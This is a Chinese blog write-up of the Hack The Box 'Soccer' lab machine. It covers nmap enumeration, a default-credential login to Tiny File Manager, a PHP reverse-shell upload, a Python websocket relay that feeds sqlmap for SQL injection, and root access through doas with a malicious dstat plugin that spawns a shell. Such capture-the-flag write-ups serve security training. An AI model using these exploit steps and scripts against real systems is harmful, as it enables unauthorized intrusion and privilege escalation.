HTB打靶日记:Soccer

已于 2022-12-29 21:56:56 修改
阅读量1.2k 收藏 4
点赞数 3
文章标签: 安全 web安全 网络安全 linux 网络
于 2022-12-29 21:52:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73998094/article/details/128483645
版权

信息收集:

nmap -p- -sT --min-rate=10000 -Pn 10.129.25.122

nmap -p- -sU --min-rate=10000 -Pn 10.129.25.122

 

nmap -p22,80 -sT -sV -sC -Pn -O 10.129.25.122

 

发现了soccer.htb,加入hosts文件中,开始爆破子域名

没有新的子域名发现

访问http://soccer.htb后发现了一些图片

下载后没有发现什么敏感的信息

 

 开始目录扫描

扫描出了/tiny目录

访问后发现了一个登陆界面

搜索一下Tiny File Manager的默认账户admin ,密码为admin@123,成功登陆后台

进入后台发现了可以文件上传的位置,上传反弹shell的php后门(这里似乎定时清除上传的文件,网巨卡,恶心死了) 

成功反弹shell,找到立足点

查看一下开放的端口,发现3306端口开放,猜测可能后续与数据库有关,但是尝试弱口令失败

 通过linpeas.sh发现了另外一个子域名,添加到hosts文件中

 访问后会发现,这似乎是一个跟世界杯有关的网站,带有登陆的部分,注册账户然后登陆

似乎是websocket

 因为上面可以传递参数,尝试websocket的sqli注入,转换脚本

from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
from urllib.parse import unquote, urlparse
from websocket import create_connection

ws_server = "ws://soc-player.soccer.htb:9091/ws"

def send_ws(payload):
	ws = create_connection(ws_server)
	# If the server returns a response on connect, use below line	
	#resp = ws.recv() # If server returns something like a token on connect you can find and extract from here
	
	# For our case, format the payload in JSON
	message = unquote(payload).replace('"','\'') # replacing " with ' to avoid breaking JSON structure
	data = '{"id":"%s"}' % message

	ws.send(data)
	resp = ws.recv()
	ws.close()

	if resp:
		return resp
	else:
		return ''

def middleware_server(host_port,content_type="text/plain"):

	class CustomHandler(SimpleHTTPRequestHandler):
		def do_GET(self) -> None:
			self.send_response(200)
			try:
				payload = urlparse(self.path).query.split('=',1)[1]
			except IndexError:
				payload = False
				
			if payload:
				content = send_ws(payload)
			else:
				content = 'No parameters specified!'

			self.send_header("Content-type", content_type)
			self.end_headers()
			self.wfile.write(content.encode())
			return

	class _TCPServer(TCPServer):
		allow_reuse_address = True

	httpd = _TCPServer(host_port, CustomHandler)
	httpd.serve_forever()


print("[+] Starting MiddleWare Server")
print("[+] Send payloads in http://localhost:8081/?id=*")

try:
	middleware_server(('0.0.0.0',8081))
except KeyboardInterrupt:
	pass

利用sqlmap进行注入,发现存在注入点

利用爆出的账户与密码成功ssh登陆

 

 经过一段时间查找,发现了doas也是可以提权的(Linux Privilege Escalation - HackTricks

 找到了配置文件

发现 /usr/bin/dstat可以用root权限执行

 dstat -h查看一下用法,似乎是可以支持自定义插件

查看了一下dstat插件的用法 dstat的插件_tiantao2012的博客-CSDN博客_/dstat 插件

将插件dstat_wen.py写入/usr/local/share/dstat/中

import os

os.system('bash -i')

运行脚本后,成功获取root权限

文(备考oscp版~)
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
HTP(hackthebox) Soccer !!!
qq_58869808的博客
12-26 756
HTB writeup
htb_Soccer
weixin_62621015的博客
03-27 195
htb_Soccer
HTB soccer
qq_64201116的博客
05-31 818
description: HTB靶机 难度:easy。
HTB-soccer
TA不懒,但还没有添加简介
03-27 486
HTB-soccer
靶场笔记-HTB Soccer
Timerings的博客
02-11 308
Hack The Box实战靶场,Soccer笔记
HTB打靶日记:Stocker
01-15
在本文中,我们将深入探讨一个名为“Stocker”的Hack The Box (HTB)靶场案例,这是一次针对Web安全、Linux系统以及JavaScript的渗透测试练习。首先,我们从信息收集开始,这是任何渗透测试的第一步。 使用Nmap进行...
HTB打靶日记:Investigation
01-27
hackthebox
HTB打靶日记:Mentor
01-11
hackthebox
HTB打靶日记:BroScience
01-10
在本文中,我们将深入探讨一个名为“BroScience”的HackTheBox靶场机器的渗透测试过程。这个场景主要涉及Web安全、Linux系统以及多种攻击技术。首先,我们从信息收集开始,使用Nmap对目标IP(10.129.125.159)进行...
HTB-writeups:此仓库包含HackTheBox的文章
05-01
【标题】"HTB-writeups:此仓库包含HackTheBox的文章" 这个标题表明这是一个与网络安全相关的资源库,特别是关于HackTheBox(HTB)的挑战和机器的解决过程记录。HackTheBox是一个在线平台,允许安全专家和爱好者通过...
websocket-injection:WebSocket 中转注入工具
06-17
WebSocket 注入 WebSocket中转注入(用于SQL注入工具:sqlmap等) 安装 git clone https://github.com/RicterZ/websocket-injection cd websocket-injection pip install -r requirements.txt 用法 python main.py --port=8888 python sqlmap.py -u "http://localhost:8888/?url=[target]&data=[sqli]" -p data 执照 麻省理工学院
HackTheBox Soccer 通过WebSockets进行SQL注入,Doas与Dstat插件提权
Ba1_Ma0的博客
12-23 2382
HackTheBox Soccer靶机wp
hackthebox-soccer
n1ght的博客
02-09 322
信息收集,文件上传,获取反弹shell之后的信息收集,websocket的sql注入,doas dstat的插件提权
从源码分析WebSocket的消息对象自动注入失败问题
qq_23603437的博客
06-09 1715
最近研究websocket是发现一个问题,自动注入失败,代码如下:@ServerEndpoint(value = "/websocket/{authToken}") @Component public class EzgoWebSocket { @Autowired private TokenService tokenService; }其中的tokenService是null,然...
Evil-WinRM一键测试主机安全情况(KALI工具系列四十四)
LNN0212的博客
07-17 553
Kali Linux 是一个功能强大、多才多艺的 Linux 发行版 ,广泛用于网络安全社区。它具有全面的预安装工具和功能集,使其成为安全测试、数字取证、事件响应和恶意软件分析的有效平台。作为使用者,你可以把它理解为一个特殊的Linux 发行版 ,集成了精心挑选的渗透测试和安全审计的工具,供渗透测试和安全设计人员使用,也可称之为平台或者框架。注意,一定只能用于自己设备的连通性测试哦!
内容安全(深度行为检测技术、IPS、AV、入侵检测方法)
最新发布
Thewei666的博客
07-17 765
区分不同的签名。
医疗健康信息的安全挑战与隐私保护最佳实践
2301_79955948的博客
07-12 1418
随着医疗信息化的发展,医疗健康数据呈现出爆炸式的增长,医院信息系统、电子病历、健康管理等产生了海量的数据,这些数据的管理和保护成为了巨大的挑战。最新的研究和政策动态显示,国家卫生健康委员会等政府部门正在积极推动医疗健康信息安全管理规范的制定和实施,以加强数据安全和个人健康医疗数据相关的隐私保护。隐私保护的最佳实践包括建立完善的数据安全管理制度、规范医疗健康数据的收集、存储和传输过程,防止数据泄露。这些要求和措施有助于确保医疗健康信息的安全性和个人隐私的保护,减少信息泄露的风险,并促进医疗行业的健康发展。
format htb
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值